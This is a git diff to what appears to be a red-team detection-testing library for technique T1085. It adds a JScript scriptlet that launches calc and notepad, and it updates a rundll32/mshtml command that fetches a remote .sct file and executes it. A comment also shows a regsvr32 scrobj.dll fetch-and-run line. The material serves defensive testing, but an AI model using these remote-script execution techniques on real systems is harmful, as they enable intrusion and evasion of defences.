diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index 3a37b690..0b2873e6 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -36,10 +36,10 @@ Test execution of a remote script using rundll32.exe
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_url | location of the payload | Url | hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
+| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
 
 #### Run it with `command_prompt`!
 ```
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
 ```
 <br/>
diff --git a/atomics/T1085/T1085.sct b/atomics/T1085/T1085.sct
new file mode 100644
index 00000000..035b60e7
--- /dev/null
+++ b/atomics/T1085/T1085.sct
@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>
diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml
index d6a37515..7aba52cf 100644
--- a/atomics/T1085/T1085.yaml
+++ b/atomics/T1085/T1085.yaml
@@ -11,8 +11,8 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
   executor:
     name: command_prompt
     command: |
-      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
